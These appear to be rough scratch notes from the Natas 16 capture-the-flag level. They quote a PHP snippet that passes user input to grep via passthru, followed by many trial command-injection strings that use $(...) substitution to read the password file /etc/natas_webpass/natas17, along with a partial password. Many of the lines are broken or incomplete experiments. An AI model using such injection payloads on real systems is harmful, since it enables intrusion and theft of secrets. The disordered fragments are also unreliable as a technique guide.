
if($key != "") {
    if(preg_match('/[;|&`\'"]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i \"$key\" dictionary.txt");
    }
}

grep -i "afri" dictionary.txt
$ grep -i "afri" dictionary.txt 
└─$ grep -i "" dictionary.txt < cat "/etc/natas_webpass/natas17

echo "'$(cat ~/otw/natas16/dictionary.txt)'"

$(tee /dev/stderr < <(cat /etc/natas_webpass/natas16))
$(tee /dev/stderr < <(echo hi))

$(cat /etc/natas_webpass/natas16 > /dev/stderr)
$(id > /dev/stderr)
$(/dev/stderr < <(echo hi))
$(echo "asd" > dev/stderr)


first character in file

grep -i "$(cat /etc/natas_webpass/natas17 > head -c 2)" dictionary.txt
grep -i "$(echo i)\(.\).*\1" dictionary.txt
$(cut -c 1,3 < /etc/natas_webpass/natas17)

^[$(cut -c 1 < /etc/natas_webpass/natas17 )]

echo -e "this is a \x22number\x22"

$(cut -c 1 test.txt)

$(cut -c 1,2 <<< $LANG)


grep -i "${LANG:0:2}" dictionary.txt

└─$ grep -i "a=22 dictionary.txt < cat /etc/natas_webpass/natas17 dictionary.txt

password:
eqjhjbo


$key = '${LANG:0:2}';
$locale = 'en_US'; // Replace with your desired locale

// Construct the full command with setting the locale
$command = "LANG=$locale grep -i \"$key\" dictionary.txt";
(grep -i "" < password) < /dev/null #"dictionary.txt
(grep -i "" < /etc/natas_webpass/natas17) < /dev/null # "dictionary.txt
grep -i "" < /etc/natas_webpass/natas17      < dictionary.txt

grep -i "\x22 dictionary.txt /etc/natas_webpass/natas17 \x22" dictionary.txt


\x22 \x22/etc/natas_webpass/natas17 #

└─$ grep -i "\x22              #" dictionary.txt

grep -i "" dictionary.txt

grep -i "$(head -n 2 dictionary.txt)" dictionary.txt